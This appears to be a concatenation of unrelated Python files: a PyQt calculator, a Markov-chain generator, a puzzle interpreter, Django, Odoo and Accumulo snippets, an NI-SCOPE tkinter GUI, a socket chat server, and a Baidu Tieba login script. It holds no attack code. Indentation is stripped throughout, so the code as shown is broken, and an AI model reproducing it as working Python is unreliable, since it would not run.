self.button6.setText(_translate("MainWindow", "6"))
self.button5.setText(_translate("MainWindow", "5"))
self.button4.setText(_translate("MainWindow", "4"))
self.button9.setText(_translate("MainWindow", "9"))
self.button8.setText(_translate("MainWindow", "8"))
self.button7.setText(_translate("MainWindow", "7"))
self.button0.setText(_translate("MainWindow", "0"))
self.add.setText(_translate("MainWindow", "+"))
self.division.setText(_translate("MainWindow", "/"))
self.subtract.setText(_translate("MainWindow", "-"))
self.multiply.setText(_translate("MainWindow", "*"))
self.equals.setText(_translate("MainWindow", "="))
self.Delete.setText(_translate("MainWindow", "Del"))
self.allClear.setText(_translate("MainWindow", "AC"))
self.label.setText(_translate("MainWindow", "0"))
self.square.setText(_translate("MainWindow", "a**2"))
self.mod.setText(_translate("MainWindow", "%"))
self.pi.setText(_translate("MainWindow", "pi"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
import random
import numpy as np
class MarkovBuilder:
def __init__(self, value_list, order):
self.value_lookup = {}
self.reverse_value_lookup = value_list
self.order = order
# 是否是第一次调用
self.first = 1
value_num = len(value_list)
# 这里记录一下训练集中各种state总的出现次数
self.previous_state = [0 for i in range(value_num)]
for i in range(0,value_num):
self.value_lookup[value_list[i]] = i
# 初始化转移矩阵
self.matrix = np.zeros([value_num for i in range(order+1)], dtype = int)
def add(self, from_value, to_value):
matrix = self.matrix
value_map = self.value_lookup
for i in range(self.order):
matrix = matrix[value_map[from_value[i]]]
#print("form value is ", from_value)
#print("to value is ", to_value)
matrix[value_map[to_value]] += 1
# 这里是对总共出现次数的计数
self.previous_state[value_map[to_value]] += 1
# 如果是第一次调用add,那么最开始的几个state也要被计入
if self.first:
for i in range(self.order):
self.previous_state[value_map[from_value[i]]] += 1
self.first = 0
def next_value(self, from_value):
value_map = self.value_lookup
#print(from_value)
value_counts = self.matrix
for i in range(self.order):
#print(from_value[i])
value_counts = value_counts[value_map[from_value[i]]]
value_index = self.randomly_choose(value_counts)
if(value_index < 0):
raise RuntimeError("Non-existent value selected.")
else:
return self.reverse_value_lookup[value_index]
def randomly_choose(self, choice_counts):
counted_sum = 0
count_sum = sum(choice_counts)
length = len(choice_counts)
if count_sum == 0:
# 如果转移概率都是0,那么从之前出现过的状态按照出现次数随机选一个状态
index = self.randomly_choose(self.previous_state)
#raise RuntimeError("向任何状态的转移概率都为0")
return index
selected_count = random.randrange(1, count_sum + 1)
for index in range(0, length):
counted_sum += choice_counts[index]
if(counted_sum >= selected_count):
return index
raise RuntimeError("Impossible value selection made. BAD!")
|
code = []
with open('data/08.txt') as f:
for i, line in enumerate(f):
instruction, num = line.strip().split(' ')
code.append([i, instruction, num[0], int(num[1:]), False])
def read_line(line, accumulator=0):
if line[4]:
print(accumulator)
else:
line[4] = True
if line[1] == 'jmp' and line[2] == '+':
read_line(code[line[0] + line[3]], accumulator)
elif line[1] == 'jmp' and line[2] == '-':
read_line(code[line[0] - line[3]], accumulator)
elif line[1] == 'acc' and line[2] == '+':
accumulator += line[3]
read_line(code[line[0] + 1], accumulator)
elif line[1] == 'acc' and line[2] == '-':
accumulator -= line[3]
read_line(code[line[0] + 1], accumulator)
else:
read_line(code[line[0] + 1], accumulator)
read_line(code[0])
|
test_case = int(input())
while test_case:
number_of_chocolate = int(input())
print((number_of_chocolate - 1)//2)
test_case -= 1 |
from django.dispatch import receiver
from vkontakte_api.signals import vkontakte_api_post_fetch
from vkontakte_groups.models import Group
from . models import GroupStatisticMembers
@receiver(vkontakte_api_post_fetch, sender=Group)
def group_statistic_create(sender, instance, **kwargs):
if instance.members_count is None:
return
GroupStatisticMembers.objects.create(group=instance,
members_count=instance.members_count)
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name': 'Products & Pricelists [TrendAV]',
'version': '1.0.1',
'category': 'Hidden',
'author': 'Ing. Rigoberto Martínez',
'maintainer': 'TrendAV',
'website': 'http://www.trendav.com',
'sequence': 2,
'depends': ['trend_base'],
'demo': [],
'description': """
This is the base module for managing products in Odoo - TrendAV.
================================================================
""",
'data': [
'security/ir.model.access.csv',
"data/product_barcode_config.xml",
"views/product_barcode_config_view.xml",
"views/product_view.xml",
"data/sequence_data.xml",
"report/report_productlabel.xml",
],
'test': [
],
'installable': True,
'auto_install': False,
}
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import os
import logging
from TestUtils import ACCUMULO_DIR
from simple.binary import BinaryTest
log = logging.getLogger('test.auto')
class BinaryStressTest(BinaryTest) :
order = 80
tableSettings = BinaryTest.tableSettings.copy()
tableSettings['bt'] = {
'table.split.threshold': '10K',
}
settings = BinaryTest.settings.copy()
settings.update({
'tserver.memory.maps.max':'50K',
'tserver.compaction.major.delay': 0,
})
def runTest(self):
BinaryTest.runTest(self)
handle = self.runOn(self.masterHost(), [
'hadoop', 'fs', '-ls', os.path.join(ACCUMULO_DIR,'tables',self.getTableId('bt'))
])
out, err = handle.communicate()
if len(out.split('\n')) < 8:
log.debug(out)
self.assert_(len(out.split('\n')) > 7)
def suite():
result = unittest.TestSuite()
result.addTest(BinaryStressTest())
return result
|
from Classes.Client import Client
from Classes.Product import Product
from Classes.Service import Service
def menu():
print "\
1 - Cadastrar cliente: \n\
2 - Cadastrar Produto: \n\
3 - Cadastrar Servico: "
opcao = input("Digite a sua opcao: ")
return opcao
def switch(x):
cli = Client()
prod = Product()
serv = Service()
dict_options = {1:cli.add_client,
2:prod.add_product,
3:serv.add_service}
dict_options[x]()
if __name__ == '__main__':
try:
while True:
switch(menu())
except Exception as e:
print "Erro: %s"%e
|
from tkinter import *
from tkinter import ttk
from tkinter.tix import *
from tkintertable import TableCanvas, TableModel
import nimodinst
import niscope
import warnings
import matplotlib
import sys
import time
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.figure import Figure
import numpy as np
class NIScopeSFP():
def __init__(self):
# Basic Vars
self.blocked = True
self.tempcounter = 0
self.meas_array = ["NO_MEASUREMENT"]
self.dev_name = ""
self.root = Tk()
self.root.title("NI-SCOPE Measurement Library DEMO")
self.root.columnconfigure(0, weight=1)
self.root.rowconfigure(0, weight=1)
self.scrollwin = ScrolledWindow(self.root)
self.scrollwin.grid(column=0, row=0)
self.win = self.scrollwin.window
self.mainframe = ttk.Frame(self.win)
self.mainframe.grid(column=0, row=0)
self.mainframe.columnconfigure(0, weight=1)
self.mainframe.rowconfigure(0, weight=1)
### CONFIG FRAME
self.config_frame = ttk.Frame(self.mainframe, borderwidth=5, height=200, width=400, relief="solid")
self.config_frame.grid(column=0, row=0, columnspan=6, rowspan=6, sticky=(N, S, E, W))
self.config_frame.columnconfigure(0, weight=1)
self.config_frame.rowconfigure(0, weight=1)
self.label_device = ttk.Label(self.config_frame, text="Current Device")
self.label_device.grid(column=0, row=0, sticky=(W))
self.curr_device = StringVar()
self.device_select = ttk.Combobox(self.config_frame, textvariable=self.curr_device)
self.device_select["values"] = self._get_devices()
self.device_select.insert(0, self._get_devices()[0])
self.device_select.grid(column=0, row=1, sticky=(W))
self.label_channels = ttk.Label(self.config_frame, text="Current Channel(s)")
self.label_channels.grid(column=0, row=2, sticky=(W))
self.curr_channel = StringVar()
self.channel_select = ttk.Entry(self.config_frame, textvariable=self.curr_channel)
self.channel_select.grid(column=0, row=3, sticky=(W))
self.channel_select.insert(0, 0)
self.label_min_sample_rate = ttk.Label(self.config_frame, text="Min Sample Rate")
self.label_min_sample_rate.grid(column=1, row=0, sticky=(N, W))
self.curr_min_sample_rate = Spinbox(self.config_frame, from_=0, to=sys.maxsize)
self.curr_min_sample_rate.grid(column=1, row=1, sticky=(W))
self.curr_min_sample_rate.insert(0, 100000)
self.label_min_record_length = ttk.Label(self.config_frame, text="Min Record Length")
self.label_min_record_length.grid(column=1, row=2, sticky=(W))
self.curr_min_record_length = Spinbox(self.config_frame, from_=1, to=sys.maxsize)
self.curr_min_record_length.grid(column=1, row=3, sticky=(W))
self.curr_min_record_length.insert(1, "000")
self.label_vertical_range = ttk.Label(self.config_frame, text="Vertical Range (V)")
self.label_vertical_range.grid(column=2, row=0, sticky=(N, W))
self.curr_vertical_range = Spinbox(self.config_frame, from_=0, to=sys.maxsize)
self.curr_vertical_range.grid(column=2, row=1, sticky=(W))
self.curr_vertical_range.delete(0)
self.curr_vertical_range.insert(0, 1)
self.label_vertical_offset = ttk.Label(self.config_frame, text="Vertical Offset (V)")
self.label_vertical_offset.grid(column=2, row=2, sticky=(W))
self.curr_vertical_offset = Spinbox(self.config_frame, from_=0, to=sys.maxsize)
self.curr_vertical_offset.grid(column=2, row=3, sticky=(W))
self.label_probe_attenuation = ttk.Label(self.config_frame, text="Probe Attenuation")
self.label_probe_attenuation.grid(column=1, row=4, sticky=(W))
self.curr_probe_attenuation = Spinbox(self.config_frame, from_=0, to=sys.maxsize)
self.curr_probe_attenuation.grid(column=1, row=5, sticky=(W))
self.curr_probe_attenuation.delete(0)
self.curr_probe_attenuation.insert(0, 1)
self.label_vertical_coupling = ttk.Label(self.config_frame, text="Vertical Coupling")
self.label_vertical_coupling.grid(column=2, row=4, sticky=(W))
self.vertical_coupling = StringVar()
self.curr_vertical_coupling = ttk.Combobox(self.config_frame, textvariable=self.vertical_coupling)
self.curr_vertical_coupling.grid(column=2, row=5, sticky=(W))
self.curr_vertical_coupling["values"] = ("AC", "DC", "Ground")
self.curr_vertical_coupling.insert(0, "AC")
self.curr_vertical_coupling.config(state="readonly")
self.self_cal_button = ttk.Button(self.config_frame, text="Self Calibration (slow)", command=self.self_cal)
self.self_cal_button.grid(column=5, row=0, sticky=(N, E))
self.start_stop_button = ttk.Button(self.config_frame, text="Run", command=self.start)
self.start_stop_button.grid(column=4, row=0, sticky=(N, W))
self.error_frame = ttk.Frame(self.config_frame, borderwidth=5, relief="sunken")
self.error_frame.grid(column=4, row=1, columnspan=2, rowspan=5, sticky=(E))
self.label_error_text = Text(self.error_frame, width=40, height=10, wrap=WORD)
self.label_error_text.grid(column=4, row=2)
self.update_settings_button = ttk.Button(self.config_frame, text="Update Configuration", command=self.update_config)
self.update_settings_button.grid(column=0, row=5, columnspan=2, sticky=(W))
#TODO: make update button actually do shit + error_text return.
### ACTIVE FRAME
self.active_frame = ttk.Frame(self.mainframe, borderwidth=5, height=200, width=400, relief="solid")
self.active_frame.grid(column=0, row=6, columnspan=6, rowspan=3, sticky=(N, S, E, W))
self.trigger_notebook = ttk.Notebook(self.active_frame)
self.trigger_notebook.grid(column=0, row=6, columnspan=2, rowspan=5, sticky=(N, S, E, W))
self.digital_trigger = ttk.Frame(self.trigger_notebook)
self.edge_trigger = ttk.Frame(self.trigger_notebook)
self.hysteresis_trigger = ttk.Frame(self.trigger_notebook)
self.immediate_trigger = ttk.Frame(self.trigger_notebook)
self.window_trigger = ttk.Frame(self.trigger_notebook)
self.trigger_notebook.add(self.digital_trigger, text="Digital")
self.trigger_notebook.add(self.edge_trigger, text="Edge")
self.trigger_notebook.add(self.hysteresis_trigger, text="Hysteresis")
self.trigger_notebook.add(self.immediate_trigger, text="Immediate")
self.trigger_notebook.add(self.window_trigger, text="Window")
self.update_trigger_settings_button = ttk.Button(self.active_frame, text="Update Trigger Settings", command=self.update_trigger)
self.update_trigger_settings_button.grid(column=0, row=11, sticky=(N, W))
# Digital Trigger
self.label_digital_trigger_source = ttk.Label(self.digital_trigger, text="Trigger Source")
self.label_digital_trigger_source.grid(column=0, row=6, sticky=(E))
self.digital_trigger_source = StringVar()
self.curr_digital_trigger_source = ttk.Entry(self.digital_trigger, textvariable=self.digital_trigger_source)
self.curr_digital_trigger_source.grid(column=1, row=6, sticky=(W))
self.curr_digital_trigger_source.insert(0, "PXI_Trig0")
self.label_digital_trigger_slope = ttk.Label(self.digital_trigger, text="Trigger Slope")
self.label_digital_trigger_slope.grid(column=0, row=7, sticky=(E))
self.digital_trigger_slope = StringVar()
self.curr_digital_trigger_slope = ttk.Combobox(self.digital_trigger, textvariable=self.digital_trigger_slope)
self.curr_digital_trigger_slope.grid(column=1, row=7, sticky=(W))
self.curr_digital_trigger_slope["values"] = ("Positive", "Negative")
self.curr_digital_trigger_slope.insert(0, "Positive")
self.curr_digital_trigger_slope.config(state="readonly")
# Edge Trigger
self.label_edge_trigger_source = ttk.Label(self.edge_trigger, text="Trigger Source")
self.label_edge_trigger_source.grid(column=0, row=6, sticky=(E))
self.edge_trigger_source = StringVar()
self.curr_edge_trigger_source = ttk.Entry(self.edge_trigger, textvariable=self.edge_trigger_source)
self.curr_edge_trigger_source.grid(column=1, row=6, sticky=(W))
self.curr_edge_trigger_source.insert(0, "0")
self.label_edge_trigger_level = ttk.Label(self.edge_trigger, text="Trigger Level")
self.label_edge_trigger_level.grid(column=0, row=7, sticky=(E))
self.curr_edge_trigger_level = Spinbox(self.edge_trigger, from_=0, to=sys.maxsize)
self.curr_edge_trigger_level.grid(column=1, row=7, sticky=(W))
self.label_edge_trigger_slope = ttk.Label(self.edge_trigger, text="Trigger Slope")
self.label_edge_trigger_slope.grid(column=0, row=8, sticky=(E))
self.edge_trigger_slope = StringVar()
self.curr_edge_trigger_slope = ttk.Combobox(self.edge_trigger, textvariable=self.edge_trigger_slope)
self.curr_edge_trigger_slope.grid(column=1, row=8, sticky=(W))
self.curr_edge_trigger_slope["values"] = ("Positive", "Negative")
self.curr_edge_trigger_slope.insert(0, "Positive")
self.curr_edge_trigger_slope.config(state="readonly")
self.label_edge_trigger_coupling = ttk.Label(self.edge_trigger, text="Trigger Coupling")
self.label_edge_trigger_coupling.grid(column=0, row=9, sticky=(E))
self.edge_trigger_coupling = StringVar()
self.curr_edge_trigger_coupling = ttk.Combobox(self.edge_trigger, textvariable=self.edge_trigger_coupling)
self.curr_edge_trigger_coupling.grid(column=1, row=9, sticky=(W))
self.curr_edge_trigger_coupling["values"] = ("AC", "DC", "HF_REJECT", "LF_REJECT", "AC_PLUS_HF_REJECT")
self.curr_edge_trigger_coupling.insert(0, "AC")
self.curr_edge_trigger_coupling.config(state="readonly")
# Hysteresis Trigger
self.label_hysteresis_trigger_source = ttk.Label(self.hysteresis_trigger, text="Trigger Source")
self.label_hysteresis_trigger_source.grid(column=0, row=6, sticky=(E))
self.hysteresis_trigger_source = StringVar()
self.curr_hysteresis_trigger_source = ttk.Entry(self.hysteresis_trigger, textvariable=self.hysteresis_trigger_source)
self.curr_hysteresis_trigger_source.grid(column=1, row=6, sticky=(W))
self.curr_hysteresis_trigger_source.insert(0, "0")
self.label_hysteresis_trigger_level = ttk.Label(self.hysteresis_trigger, text="Trigger Level")
self.label_hysteresis_trigger_level.grid(column=0, row=7, sticky=(E))
self.curr_hysteresis_trigger_level = Spinbox(self.hysteresis_trigger, from_=0, to=sys.maxsize)
self.curr_hysteresis_trigger_level.grid(column=1, row=7, sticky=(W))
self.label_hysteresis = ttk.Label(self.hysteresis_trigger, text="Hysteresis")
self.label_hysteresis.grid(column=0, row=8, sticky=(E))
self.curr_hysteresis = Spinbox(self.hysteresis_trigger, from_=0, to=sys.maxsize)
self.curr_hysteresis.grid(column=1, row=8, sticky=(W))
self.label_hysteresis_trigger_slope = ttk.Label(self.hysteresis_trigger, text="Trigger Slope")
self.label_hysteresis_trigger_slope.grid(column=0, row=9, sticky=(E))
self.hysteresis_trigger_slope = StringVar()
self.curr_hysteresis_trigger_slope = ttk.Combobox(self.hysteresis_trigger, textvariable=self.hysteresis_trigger_slope)
self.curr_hysteresis_trigger_slope.grid(column=1, row=9, sticky=(W))
self.curr_hysteresis_trigger_slope["values"] = ("Positive", "Negative")
self.curr_hysteresis_trigger_slope.insert(0, "Positive")
self.curr_hysteresis_trigger_slope.config(state="readonly")
self.label_hysteresis_trigger_coupling = ttk.Label(self.hysteresis_trigger, text="Trigger Coupling")
self.label_hysteresis_trigger_coupling.grid(column=0, row=10, sticky=(E))
self.hysteresis_trigger_coupling = StringVar()
self.curr_hysteresis_trigger_coupling = ttk.Combobox(self.hysteresis_trigger, textvariable=self.hysteresis_trigger_coupling)
self.curr_hysteresis_trigger_coupling.grid(column=1, row=10, sticky=(W))
self.curr_hysteresis_trigger_coupling["values"] = ("AC", "DC", "HF_REJECT", "LF_REJECT", "AC_PLUS_HF_REJECT")
self.curr_hysteresis_trigger_coupling.insert(0, "AC")
self.curr_hysteresis_trigger_coupling.config(state="readonly")
# Immediate Trigger
self.label_immediate_trigger = ttk.Label(self.immediate_trigger, text="N/A")
self.label_immediate_trigger.grid(column=0, row=6, sticky=(N))
# Window Trigger
self.label_window_trigger_source = ttk.Label(self.window_trigger, text="Trigger Source")
self.label_window_trigger_source.grid(column=0, row=6, sticky=(E))
self.window_trigger_source = StringVar()
self.curr_window_trigger_source = ttk.Entry(self.window_trigger, textvariable=self.window_trigger_source)
self.curr_window_trigger_source.grid(column=1, row=6, sticky=(W))
self.curr_window_trigger_source.insert(0, "0")
self.label_window_mode = ttk.Label(self.window_trigger, text="Window Mode")
self.label_window_mode.grid(column=0, row=7, sticky=(E))
self.window_mode = StringVar()
self.curr_window_mode = ttk.Combobox(self.window_trigger, textvariable=self.window_mode)
self.curr_window_mode.grid(column=1, row=7, sticky=(W))
self.curr_window_mode["values"] = ("Entering", "Leaving")
self.curr_window_mode.insert(0, "Entering")
self.curr_window_mode.config(state="readonly")
self.label_window_low_level = ttk.Label(self.window_trigger, text="Window Low Level")
self.label_window_low_level.grid(column=0, row=8, sticky=(E))
self.curr_window_low_level = Spinbox(self.window_trigger, from_=-sys.maxsize, to=sys.maxsize)
self.curr_window_low_level.grid(column=1, row=8, sticky=(W))
self.curr_window_low_level.delete(0, "end")
self.curr_window_low_level.insert(0, 0)
self.label_window_high_level = ttk.Label(self.window_trigger, text="Window High Level")
self.label_window_high_level.grid(column=0, row=9, sticky=(E))
self.curr_window_high_level = Spinbox(self.window_trigger, from_=-sys.maxsize, to=sys.maxsize)
self.curr_window_high_level.grid(column=1, row=9, sticky=(W))
self.curr_window_high_level.delete(0, "end")
self.curr_window_high_level.insert(0, 0)
self.label_window_trigger_coupling = ttk.Label(self.window_trigger, text="Trigger Coupling")
self.label_window_trigger_coupling.grid(column=0, row=10, sticky=(E))
self.window_trigger_coupling = StringVar()
self.curr_window_trigger_coupling = ttk.Combobox(self.window_trigger, textvariable=self.window_trigger_coupling)
self.curr_window_trigger_coupling.grid(column=1, row=10, sticky=(W))
self.curr_window_trigger_coupling["values"] = ("AC", "DC", "HF_REJECT", "LF_REJECT", "AC_PLUS_HF_REJECT")
self.curr_window_trigger_coupling.insert(0, "AC")
self.curr_window_trigger_coupling.config(state="readonly")
### GRAPH FRAME
self.graph_frame = ttk.Frame(self.active_frame, borderwidth=5, relief="sunken")
self.graph_frame.grid(column=2, row=6, columnspan=4, rowspan=6, sticky=(N, S, E, W))
self.graph_plot = Figure(figsize=(5,5), dpi=100)
self.subplot = self.graph_plot.add_subplot(111)
self.subplot.plot([0],[0])
self.graph_canvas = FigureCanvasTkAgg(self.graph_plot, self.graph_frame)
self.graph_canvas.draw()
self.graph_canvas.get_tk_widget().grid(column=2, row=6, columnspan=4, rowspan=6, sticky=(N, S, E, W))
# TODO: make graph functional
### MEASUREMENTS FRAME
self.measurements_frame = ttk.Frame(self.mainframe)
self.measurements_frame.grid(column=0, row=12, columnspan=6, sticky=(N, S, E, W))
self.meas_label = ttk.Label(self.measurements_frame, text="Measurements")
self.meas_label.grid(column=0, row=12, columnspan=2, sticky=(W))
self.add_meas = ttk.Button(self.measurements_frame, text="+", command=self.add_measurement)
self.add_meas.grid(column=2, row=12)
self.remove_meas = ttk.Button(self.measurements_frame, text="-", command=self.remove_measurement)
self.remove_meas.grid(column=3, row=12)
self.table_frame = ttk.Frame(self.mainframe)
self.table_frame.grid(column=0, row=13)
self.test_data = {"MEAS_1": {"Measurement": "NO_MEASUREMENT", "Channel": 0, "Result": 0, "Mean": 0, "StDev": 0, "Min": 0, "Max": 0, "Num in Stats": 0}}
self.table = TableCanvas(self.table_frame, data=self.test_data, read_only=True)
self.table.show()
#TODO: make table read from actual measurements in live time (w/ stats)
# Setup functions
self.session = None
self.update_config()
self.update_trigger()
self._set_message("Ready!")
self.root.mainloop()
def _get_devices(self):
with nimodinst.Session("niscope") as session:
return [dev.device_name for dev in session.devices]
def _get_measurements(self):
return [i.name for i in niscope.enums.ScalarMeasurement if not i.name in self.meas_array]
def _set_message(self, text):
self.label_error_text.config(state=NORMAL)
self.label_error_text.delete(1.0, "end")
self.label_error_text.insert(1.0, text)
self.label_error_text.config(state=DISABLED)
def _start_fetching(self):
if self.blocked:
return
self.update_graph()
self.update_table()
self.root.after(1000, self._start_fetching)
def add_measurement(self):
self.add_meas_window = Toplevel(self.root)
add_meas_window_frame = ttk.Frame(self.add_meas_window)
add_meas_window_frame.grid(column=0, row=0)
add_meas_label = ttk.Label(add_meas_window_frame, text="Choose a measurement to add.")
add_meas_label.grid(column=1, row=0, sticky=(N))
meas_to_add = StringVar()
self.add_meas_combobox = ttk.Combobox(add_meas_window_frame, textvariable=meas_to_add)
possible_meas = self._get_measurements()
self.add_meas_combobox.grid(column=1, row=1, sticky=(N))
self.add_meas_combobox["values"] = possible_meas
self.add_meas_combobox.insert(0, possible_meas[1])
self.add_meas_combobox.config(state="readonly")
add_meas_button = ttk.Button(add_meas_window_frame, text="Add", command=self.confirm_measurement)
add_meas_button.grid(column=0, row=2, sticky=(W))
cancel_meas_button = ttk.Button(add_meas_window_frame, text="Cancel", command=self.cancel_measurement)
cancel_meas_button.grid(column=2, row=2, sticky=(E))
def cancel_measurement(self):
self.add_meas_window.destroy()
def confirm_measurement(self):
self.meas_array.append(self.add_meas_combobox.get())
self._set_message("Measurement {0} added!".format(self.add_meas_combobox.get()))
self.add_meas_window.destroy()
self.update_table()
def dummy(self):
self.channel_select.delete(0, "end")
self.channel_select.insert(0, "dummy")
def remove_measurement(self):
if(len(self.meas_array) == 0):
self._set_message("No measurements to remove!")
else:
del self.meas_array[-1]
self.update_table()
def self_cal(self):
self._set_message("Now calibrating...")
self.stop()
try:
with self.session as session:
session.self_cal()
except Exception as e:
self._set_message(str(e))
else:
self._set_message("Self calibration successful!")
def start(self):
# Begin indefinitely fetching
self.start_stop_button.configure(text="Stop", command=self.stop)
self.blocked = False
self._start_fetching()
def stop(self):
# Stop indefinitely fetching
self.start_stop_button.configure(text="Run", command=self.start)
self.blocked = True
def update_config(self):
try:
self.config_channels = int(self.curr_channel.get())
except:
self.config_channels = self.curr_channel.get()
self.cached_absolute_initial_x = 0.0
self.cached_x_increment = 0.0
try:
if self.dev_name != self.curr_device.get():
if self.session is not None:
self.session.close()
self.session = niscope.Session(self.curr_device.get())
self.dev_name = self.curr_device.get()
self.session.configure_vertical(range=float(self.curr_vertical_range.get()),
coupling=niscope.VerticalCoupling[self.curr_vertical_coupling.get()],
offset=float(self.curr_vertical_offset.get()), probe_attenuation=float(self.curr_probe_attenuation.get()))
self.session.configure_horizontal_timing(min_sample_rate=float(self.curr_min_sample_rate.get()),
min_num_pts=int(self.curr_min_record_length.get()), ref_position=50.0, num_records=1, enforce_realtime=True)
except Exception as e:
self._set_message(str(e))
else:
self._set_message("Successfully updated configuration!")
def update_graph(self):
if self.blocked:
return
try:
with self.session.initiate():
wfm_infos = self.session.channels[self.config_channels].fetch(num_samples=int(self.curr_min_sample_rate.get()))
if self.cached_x_increment != wfm_infos[0].x_increment or self.cached_absolute_initial_x != wfm_infos[0].absolute_initial_x:
self.cached_x_axis_values = []
for i in range(int(self.curr_min_sample_rate.get())):
self.cached_x_axis_values.append(wfm_infos[0].absolute_initial_x + (i * wfm_infos[0].x_increment))
self.cached_x_increment = wfm_infos[0].x_increment
self.cached_absolute_initial_x = wfm_infos[0].absolute_initial_x
self.subplot.clear()
for wfm_info in wfm_infos:
self.subplot.plot(self.cached_x_axis_values, wfm_info.samples)
self.graph_canvas.draw()
except Exception as e:
self._set_message(str(e))
def update_table(self):
try:
temp_dict = {}
for meas in self.meas_array:
with self.session.initiate():
measurement_stat = self.session.channels[self.config_channels].fetch_measurement_stats(
niscope.enums.ScalarMeasurement[meas], 5.0)
for stat in measurement_stat:
inner_temp_dict = {}
inner_temp_dict["Measurement"] = meas
inner_temp_dict["Channel"] = stat.channel
inner_temp_dict["Result"] = stat.result
inner_temp_dict["Mean"] = stat.mean
inner_temp_dict["StDev"] = stat.stdev
inner_temp_dict["Min"] = stat.min_val
inner_temp_dict["Max"] = stat.max_val
inner_temp_dict["Num in Stats"] = stat.num_in_stats
key = meas + "_" + stat.channel
temp_dict[key] = inner_temp_dict
self.table = TableCanvas(self.table_frame, data=temp_dict, read_only=True)
self.table.show()
except Exception as e:
self._set_message(str(e))
def update_trigger(self):
self.session.trigger_modifier = niscope.enums.TriggerModifier.AUTO
self.trigger_type = self.trigger_notebook.tab(self.trigger_notebook.select(), "text")
try:
if self.trigger_type == "Digital":
self.session.configure_trigger_digital(self.digital_trigger_source.get(),
niscope.enums.TriggerSlope[self.digital_trigger_slope.get().upper()])
elif self.trigger_type == "Edge":
self.session.configure_trigger_edge(self.edge_trigger_source.get(),
float(self.curr_edge_trigger_level.get()),
niscope.enums.TriggerCoupling[self.edge_trigger_coupling.get().upper()],
niscope.enums.TriggerSlope[self.edge_trigger_slope.get().upper()])
elif self.trigger_type == "Hysteresis":
self.session.configure_trigger_hysteresis(self.hysteresis_trigger_source.get(),
float(self.curr_hysteresis_trigger_level.get()), float(self.curr_hysteresis.get()),
niscope.enums.TriggerCoupling[self.hysteresis_trigger_coupling.get().upper()],
niscope.enums.TriggerSlope[self.hysteresis_trigger_slope.get().upper()])
elif self.trigger_type == "Immediate":
self.session.configure_trigger_immediate()
elif self.trigger_type == "Window":
self.session.configure_trigger_window(self.window_trigger_source.get(),
float(self.curr_window_low_level.get()), float(self.curr_window_high_level.get()),
niscope.enums.TriggerWindowMode[self.window_mode.get().upper()],
niscope.enums.TriggerCoupling[self.window_trigger_coupling.get().upper()])
except Exception as e:
self._set_message(str(e))
else:
self._set_message("Successfully updated trigger settings!")
main = NIScopeSFP() |
import socket
from threading import Thread
host = 'localhost'
port = 8080
clients = {}
addresses = {}
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, port))
def handle_clients(conn, address):
name = conn.recv(1024).decode()
welcome = "Welcome " + name + ". You can type #quit if you want to leave the chat room."
conn.send(bytes(welcome, "utf8"))
msg = name + " has recently joined the chat room."
broadcast(bytes(msg, "utf8"))
clients[conn] = name
while True:
msg = conn.recv(1024)
if msg != bytes("#quit", "utf8"):
broadcast(msg, name + ":")
else:
conn.send(bytes("#quit", "utf8"))
conn.close()
del clients[conn]
broadcast(bytes(name + " has left the chat room.", "utf8"))
break
def accept_client_connections():
while True:
client_conn, client_address = sock.accept()
print(client_address, " has connected")
client_conn.send("Welcome to the Chat room, please type your name to continue".encode("utf8"))
addresses[client_conn] = client_address
Thread(target=handle_clients, args=(client_conn, client_address)).start()
def broadcast(msg, prefix=""):
for x in clients:
x.send(bytes(prefix, "utf8") + msg)
# sock.listen(1) # one request at one time
# print("The server is running and is listening to client requests.")
# conn, address = sock.accept()
# message = 'Hey there is something important for you!'
# conn.send(message.encode())
# conn.close()
if __name__ == "__main__":
sock.listen(5)
print("The server is running and is listening to client requests.")
t1 = Thread(target=accept_client_connections)
t1.start()
t1.join() |
# -*- coding: utf8 -*-
__author__ = 'fangc'
import requests
import re
import platform, os
import cookielib
import json
import urllib
import time
import sys
requests.packages.urllib3.disable_warnings()
# todo:修改windows命令行下登录失败的问题,还未定位到问题原因
def get_tt():
return str(int(time.time() * 1000))
requests = requests.session()
requests.cookies = cookielib.LWPCookieJar('cookies.txt')
try:
requests.cookies.load(ignore_discard=True, ignore_expires=True)
# print requests.cookies
except:
print u"还未登录百度"
HEADER = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8",
"Connection": "keep-alive",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36"
}
MAIN_URL = "http://tieba.baidu.com/"
BAIDU_CAT_URL_MAIN = "http://passport.baidu.com/cgi-bin/genimage?"
class NetworkError(Exception):
pass
class Login2(object):
def __init__(self, username=None, password=None):
self.username = username
self.password = password
self.URL_BAIDU_SIGN = 'http://tieba.baidu.com/sign/add'
def login_choice(self):
"""
选择登录的方式:
1:帐号密码登录.2:扫描二维码登录
:return:
"""
print(u"请选择登录方式:\n"
u"1:帐号密码登录(不支持手机号登录).\n"
u"2:手机百度扫描二维码登录.\n"
u"请输入号码:")
login_type = int(raw_input())
if login_type == 1:
print(u"请输入帐号:")
self.username = raw_input()
print(u"请输入密码:")
self.password = raw_input()
self.login()
elif login_type == 2:
self.login_qrcode()
else:
print(u"输入错误信息!程序将退出")
sys.exit()
def login(self):
"""
帐号密码登录
:return:
"""
if self.islogin():
print u"已从cookie加载配置,登录成功!"
